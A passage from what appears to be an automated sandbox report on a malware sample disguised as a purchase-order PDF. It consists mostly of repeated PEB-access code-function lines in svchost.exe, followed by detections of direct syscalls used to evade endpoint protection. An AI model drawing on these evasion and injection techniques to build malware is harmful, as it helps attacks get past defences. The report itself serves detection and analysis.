            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov eax, dword ptr fs:[00000030h]2_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03CF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32050 mov eax, dword ptr fs:[00000030h]2_2_03C32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD705E mov ebx, dword ptr fs:[00000030h]2_2_03CD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD705E mov eax, dword ptr fs:[00000030h]2_2_03CD705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B052 mov eax, dword ptr fs:[00000030h]2_2_03C5B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6050 mov eax, dword ptr fs:[00000030h]2_2_03CB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB106E mov eax, dword ptr fs:[00000030h]2_2_03CB106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D05060 mov eax, dword ptr fs:[00000030h]2_2_03D05060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov ecx, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41070 mov eax, dword ptr fs:[00000030h]2_2_03C41070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C073 mov eax, dword ptr fs:[00000030h]2_2_03C5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD070 mov ecx, dword ptr fs:[00000030h]2_2_03CAD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4000 mov ecx, dword ptr fs:[00000030h]2_2_03CB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A020 mov eax, dword ptr fs:[00000030h]2_2_03C2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C020 mov eax, dword ptr fs:[00000030h]2_2_03C2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF903E mov eax, dword ptr fs:[00000030h]2_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF903E mov eax, dword ptr fs:[00000030h]2_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF903E mov eax, dword ptr fs:[00000030h]2_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF903E mov eax, dword ptr fs:[00000030h]2_2_03CF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C357C0 mov eax, dword ptr fs:[00000030h]2_2_03C357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C357C0 mov eax, dword ptr fs:[00000030h]2_2_03C357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C357C0 mov eax, dword ptr fs:[00000030h]2_2_03C357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB07C3 mov eax, dword ptr fs:[00000030h]2_2_03CB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3D7E0 mov ecx, dword ptr fs:[00000030h]2_2_03C3D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C527ED mov eax, dword ptr fs:[00000030h]2_2_03C527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C347FB mov eax, dword ptr fs:[00000030h]2_2_03C347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF78A mov eax, dword ptr fs:[00000030h]2_2_03CEF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB97A9 mov eax, dword ptr fs:[00000030h]2_2_03CB97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBF7AF mov eax, dword ptr fs:[00000030h]2_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBF7AF mov eax, dword ptr fs:[00000030h]2_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBF7AF mov eax, dword ptr fs:[00000030h]2_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBF7AF mov eax, dword ptr fs:[00000030h]2_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBF7AF mov eax, dword ptr fs:[00000030h]2_2_03CBF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D037B6 mov eax, dword ptr fs:[00000030h]2_2_03D037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C307AF mov eax, dword ptr fs:[00000030h]2_2_03C307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5D7B0 mov eax, dword ptr fs:[00000030h]2_2_03C5D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F7BA mov eax, dword ptr fs:[00000030h]2_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C43740 mov eax, dword ptr fs:[00000030h]2_2_03C43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C43740 mov eax, dword ptr fs:[00000030h]2_2_03C43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C43740 mov eax, dword ptr fs:[00000030h]2_2_03C43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov esi, dword ptr fs:[00000030h]2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6674D mov eax, dword ptr fs:[00000030h]2_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30750 mov eax, dword ptr fs:[00000030h]2_2_03C30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72750 mov eax, dword ptr fs:[00000030h]2_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D03749 mov eax, dword ptr fs:[00000030h]2_2_03D03749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4755 mov eax, dword ptr fs:[00000030h]2_2_03CB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B765 mov eax, dword ptr fs:[00000030h]2_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B765 mov eax, dword ptr fs:[00000030h]2_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B765 mov eax, dword ptr fs:[00000030h]2_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2B765 mov eax, dword ptr fs:[00000030h]2_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C38770 mov eax, dword ptr fs:[00000030h]2_2_03C38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40770 mov eax, dword ptr fs:[00000030h]2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C37703 mov eax, dword ptr fs:[00000030h]2_2_03C37703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C35702 mov eax, dword ptr fs:[00000030h]2_2_03C35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C35702 mov eax, dword ptr fs:[00000030h]2_2_03C35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C700 mov eax, dword ptr fs:[00000030h]2_2_03C6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30710 mov eax, dword ptr fs:[00000030h]2_2_03C30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60710 mov eax, dword ptr fs:[00000030h]2_2_03C60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6F71F mov eax, dword ptr fs:[00000030h]2_2_03C6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6F71F mov eax, dword ptr fs:[00000030h]2_2_03C6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF72E mov eax, dword ptr fs:[00000030h]2_2_03CEF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C33720 mov eax, dword ptr fs:[00000030h]2_2_03C33720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4F720 mov eax, dword ptr fs:[00000030h]2_2_03C4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4F720 mov eax, dword ptr fs:[00000030h]2_2_03C4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4F720 mov eax, dword ptr fs:[00000030h]2_2_03C4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF972B mov eax, dword ptr fs:[00000030h]2_2_03CF972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C720 mov eax, dword ptr fs:[00000030h]2_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B73C mov eax, dword ptr fs:[00000030h]2_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B73C mov eax, dword ptr fs:[00000030h]2_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B73C mov eax, dword ptr fs:[00000030h]2_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B73C mov eax, dword ptr fs:[00000030h]2_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29730 mov eax, dword ptr fs:[00000030h]2_2_03C29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C29730 mov eax, dword ptr fs:[00000030h]2_2_03C29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C65734 mov eax, dword ptr fs:[00000030h]2_2_03C65734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3973A mov eax, dword ptr fs:[00000030h]2_2_03C3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3973A mov eax, dword ptr fs:[00000030h]2_2_03C3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov ecx, dword ptr fs:[00000030h]2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6273C mov eax, dword ptr fs:[00000030h]2_2_03C6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAC730 mov eax, dword ptr fs:[00000030h]2_2_03CAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]2_2_03C6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3B6C0 mov eax, dword ptr fs:[00000030h]2_2_03C3B6C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC mov eax, dword ptr fs:[00000030h]2_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC mov eax, dword ptr fs:[00000030h]2_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC mov eax, dword ptr fs:[00000030h]2_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC mov eax, dword ptr fs:[00000030h]2_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF6C7 mov eax, dword ptr fs:[00000030h]2_2_03CEF6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C616CF mov eax, dword ptr fs:[00000030h]2_2_03C616CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC36EE mov eax, dword ptr fs:[00000030h]2_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC36EE mov eax, dword ptr fs:[00000030h]2_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC36EE mov eax, dword ptr fs:[00000030h]2_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC36EE mov eax, dword ptr fs:[00000030h]2_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC36EE mov eax, dword ptr fs:[00000030h]2_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC36EE mov eax, dword ptr fs:[00000030h]2_2_03CC36EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5D6E0 mov eax, dword ptr fs:[00000030h]2_2_03C5D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5D6E0 mov eax, dword ptr fs:[00000030h]2_2_03C5D6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C636EF mov eax, dword ptr fs:[00000030h]2_2_03C636EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]2_2_03CAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB06F1 mov eax, dword ptr fs:[00000030h]2_2_03CB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CED6F0 mov eax, dword ptr fs:[00000030h]2_2_03CED6F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB368C mov eax, dword ptr fs:[00000030h]2_2_03CB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB368C mov eax, dword ptr fs:[00000030h]2_2_03CB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB368C mov eax, dword ptr fs:[00000030h]2_2_03CB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB368C mov eax, dword ptr fs:[00000030h]2_2_03CB368C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34690 mov eax, dword ptr fs:[00000030h]2_2_03C34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]2_2_03C6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D6AA mov eax, dword ptr fs:[00000030h]2_2_03C2D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D6AA mov eax, dword ptr fs:[00000030h]2_2_03C2D6AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C276B2 mov eax, dword ptr fs:[00000030h]2_2_03C276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C276B2 mov eax, dword ptr fs:[00000030h]2_2_03C276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C276B2 mov eax, dword ptr fs:[00000030h]2_2_03C276B2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C666B0 mov eax, dword ptr fs:[00000030h]2_2_03C666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4C640 mov eax, dword ptr fs:[00000030h]2_2_03C4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF866E mov eax, dword ptr fs:[00000030h]2_2_03CF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A660 mov eax, dword ptr fs:[00000030h]2_2_03C6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C69660 mov eax, dword ptr fs:[00000030h]2_2_03C69660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C69660 mov eax, dword ptr fs:[00000030h]2_2_03C69660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C62674 mov eax, dword ptr fs:[00000030h]2_2_03C62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C61607 mov eax, dword ptr fs:[00000030h]2_2_03C61607
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE609 mov eax, dword ptr fs:[00000030h]2_2_03CAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6F603 mov eax, dword ptr fs:[00000030h]2_2_03C6F603
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4260B mov eax, dword ptr fs:[00000030h]2_2_03C4260B
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0004997C GetProcessHeap,RtlAllocateHeap,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_0004997C
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0003A2A4 SetUnhandledExceptionFilter,0_2_0003A2A4
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0003A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0003A2D5

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
